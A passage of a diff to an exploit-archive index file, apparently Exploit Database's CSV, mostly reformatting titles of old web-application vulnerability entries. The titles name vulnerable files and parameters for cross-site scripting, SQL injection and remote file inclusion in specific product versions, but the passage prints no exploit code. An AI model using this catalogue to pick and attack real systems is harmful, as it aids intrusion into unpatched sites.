Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0 28498,platforms/php/webapps/28498.txt,"Vikingboard 0.1b - 'report.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0 28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 - 'topic.php' SQL Injection",2006-09-08,Hessam-x,php,webapps,0 -28502,platforms/php/webapps/28502.txt,"TextAds - delete.php id Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 -28503,platforms/php/webapps/28503.txt,"TextAds - error.php error Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 +28502,platforms/php/webapps/28502.txt,"TextAds - 'delete.php?id' Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 +28503,platforms/php/webapps/28503.txt,"TextAds - 'error.php?error' Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 -29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - QB_Path Parameter Multiple Remote File Inclusion",2006-12-27,Shell,php,webapps,0 +29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - 'QB_Path' Multiple Remote File Inclusions",2006-12-27,Shell,php,webapps,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 - 'index.php' album Parameter Cross-Site Scripting",2006-09-11,cdg393,php,webapps,0 28511,platforms/php/webapps/28511.txt,"PHProg 1.0 - 'index.php' lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 28514,platforms/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 - Terminal Parameter Directory Traversal",2006-09-12,"Chris Murtagh",cgi,webapps,0 -28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - rightbar.php suser Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 -28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - open_tickets.php ticket_id Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 +28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - 'rightbar.php?suser' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 +28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - 'open_tickets.php?ticket_id' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 -40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0 +40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0 28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0 28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - 'print.php' Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - includes/admin.inc.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28526,platforms/php/webapps/28526.txt,"Telekorn Signkorn Guestbook 1.x - help.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28527,platforms/php/webapps/28527.txt,"Telekorn Signkorn Guestbook 1.x - smile.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28536,platforms/php/webapps/28536.txt,"Telekorn Signkorn Guestbook 1.x - entry.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - admin/preview.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - admin/log.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - admin/index.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - admin/config.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - admin/admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - 'includes/functions.gb.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - 'includes/functions.admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - 'includes/admin.inc.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28526,platforms/php/webapps/28526.txt,"Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28527,platforms/php/webapps/28527.txt,"Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28536,platforms/php/webapps/28536.txt,"Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/preview.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/log.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/config.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 - Haut.php Cross-Site Scripting",2006-09-13,ThE__LeO,php,webapps,0 28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 - Ratings.php Cross-Site Scripting",2006-09-13,meto5757,php,webapps,0 -28545,platforms/php/webapps/28545.txt,"e107 website system 0.7.5 - contact.php Query String (PATH_INFO) Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 -28546,platforms/php/webapps/28546.txt,"e107 website system 0.7.5 - download.php Query String (PATH_INFO) Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 -28547,platforms/php/webapps/28547.txt,"e107 website system 0.7.5 - admin.php Query String (PATH_INFO) Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 -28548,platforms/php/webapps/28548.txt,"e107 website system 0.7.5 - fpw.php Query String (PATH_INFO) Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 -28549,platforms/php/webapps/28549.txt,"e107 website system 0.7.5 - 'news.php' Query String 'PATH_INFO' Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 -28551,platforms/php/webapps/28551.txt,"e107 website system 0.7.5 - search.php Query String (PATH_INFO) Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 -28552,platforms/php/webapps/28552.txt,"e107 website system 0.7.5 - signup.php Query String (PATH_INFO) Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 -28554,platforms/php/webapps/28554.txt,"e107 website system 0.7.5 - 'submitnews.php' Query String 'PATH_INFO' Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28545,platforms/php/webapps/28545.txt,"e107 website system 0.7.5 - 'contact.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28546,platforms/php/webapps/28546.txt,"e107 website system 0.7.5 - 'download.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28547,platforms/php/webapps/28547.txt,"e107 website system 0.7.5 - 'admin.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28548,platforms/php/webapps/28548.txt,"e107 website system 0.7.5 - 'fpw.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28549,platforms/php/webapps/28549.txt,"e107 website system 0.7.5 - 'news.php?PATH_INFO' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28551,platforms/php/webapps/28551.txt,"e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28552,platforms/php/webapps/28552.txt,"e107 website system 0.7.5 - 'signup.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28554,platforms/php/webapps/28554.txt,"e107 website system 0.7.5 - 'submitnews.php?PATH_INFO' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 28555,platforms/hardware/webapps/28555.txt,"Good for Enterprise 2.2.2.1611 - Cross-Site Scripting",2013-09-25,Mario,hardware,webapps,0 -28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 - user.php Query String (PATH_INFO) Parameter Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 +28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 - 'user.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 28557,platforms/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",linux,webapps,0 28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b - 'index.php' Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps,0 @@ -30597,24 +30598,24 @@ id,file,description,date,author,platform,type,port 28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 - links.php HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Inclusion",2006-09-14,igi,php,webapps,0 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 -28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - admin/inc/footer.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 -28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - admin/inc/header.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 -28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php Username' Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 +28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - 'admin/inc/footer.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps,0 +28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - 'admin/inc/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps,0 +28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php?Username' SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 -28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion",2006-09-14,"Saudi Hackrz",php,webapps,0 +28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusions",2006-09-14,"Saudi Hackrz",php,webapps,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - default.asp SQL Injection",2006-09-14,ajann,asp,webapps,0 28580,platforms/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 -28582,platforms/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/blocks.php Multiple Parameter Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 -28583,platforms/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/register.php Multiple Parameter Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 -28584,platforms/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/mass-email.php Multiple Parameter Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 -28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/search.php Multiple Parameter Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 -28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/register Multiple Parameter SQL Injection",2006-09-15,"HACKERS PAL",php,webapps,0 +28582,platforms/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28583,platforms/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28584,platforms/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/register Multiple SQL Injections",2006-09-15,"HACKERS PAL",php,webapps,0 28587,platforms/asp/webapps/28587.txt,"EasyPage 7 - Default.aspx SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 - members.asp Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 -28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 - REP_CLASS Multiple Remote File Inclusion",2006-09-16,ERNE,php,webapps,0 -28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 - profile.php Multiple Parameter SQL Injection",2006-09-16,"HACKERS PAL",php,webapps,0 -28592,platforms/php/webapps/28592.txt,"PHP-post Web Forum 0.x.1.0 - pm.php replyuser Parameter Cross-Site Scripting",2006-09-16,"HACKERS PAL",php,webapps,0 +28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 - 'REP_CLASS' Multiple Remote File Inclusions",2006-09-16,ERNE,php,webapps,0 +28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 - 'profile.php' Multiple SQL Injections",2006-09-16,"HACKERS PAL",php,webapps,0 +28592,platforms/php/webapps/28592.txt,"PHP-post Web Forum 0.x.1.0 - 'pm.php?replyuser' Cross-Site Scripting",2006-09-16,"HACKERS PAL",php,webapps,0 28593,platforms/asp/webapps/28593.txt,"ZilekPortal 1.0 - Haberdetay.asp SQL Injection",2006-09-16,chernobiLe,asp,webapps,0 28594,platforms/php/webapps/28594.txt,"Artmedic Links 5.0 - 'index.php' Remote File Inclusion",2006-09-16,botan,php,webapps,0 28597,platforms/asp/webapps/28597.txt,"ECardPro 2.0 - search.asp SQL Injection",2006-09-18,ajann,asp,webapps,0 @@ -30626,14 +30627,14 @@ id,file,description,date,author,platform,type,port 28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - search.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - updateuser Servlet in_name Parameter Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - imgen.php Root Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28613,platforms/php/webapps/28613.txt,"RedBLoG 0.5 - common.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 - admin/index.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - 'admin/config.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28613,platforms/php/webapps/28613.txt,"RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 - 'admin/index.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28615,platforms/asp/webapps/28615.txt,"DotNetNuke 4.0 - HTML Injection",2006-09-17,"Secure Shapes",asp,webapps,0 28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 - Choix_langue.php Directory Traversal",2006-09-20,cdg393,php,webapps,0 28617,platforms/php/webapps/28617.txt,"BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 @@ -30663,31 +30664,31 @@ id,file,description,date,author,platform,type,port 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - FileManager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 -28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - 'admin/forgot_pass.php?user_name' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 40359,platforms/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,osx,webapps,0 -28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php order_id' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - 'view_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - 'view_doc.php?view_doc' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - 'admin/print_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 - Media.php Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 -28662,platforms/php/webapps/28662.txt,"Photostore - details.php gid Parameter Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 -28663,platforms/php/webapps/28663.txt,"Photostore - view_photog.php photogid Parameter Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 +28662,platforms/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 +28663,platforms/php/webapps/28663.txt,"Photostore - 'view_photog.php?photogid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 -28667,platforms/php/webapps/28667.txt,"BirdBlog 1.x - comment.php entryid Parameter Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 +28667,platforms/php/webapps/28667.txt,"BirdBlog 1.x - 'comment.php?entryid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 28668,platforms/php/webapps/28668.txt,"BirdBlog 1.x - 'index.php' page Parameter Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 -28669,platforms/php/webapps/28669.txt,"BirdBlog 1.x - user.php uid Parameter Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 +28669,platforms/php/webapps/28669.txt,"BirdBlog 1.x - 'user.php?uid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 - 'index.php' page Parameter Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 -28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 - admin.php do Parameter Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 +28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 - 'admin.php?do' Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 - 'index2.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28673,platforms/php/webapps/28673.txt,"Exporia 0.3 - 'Common.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File 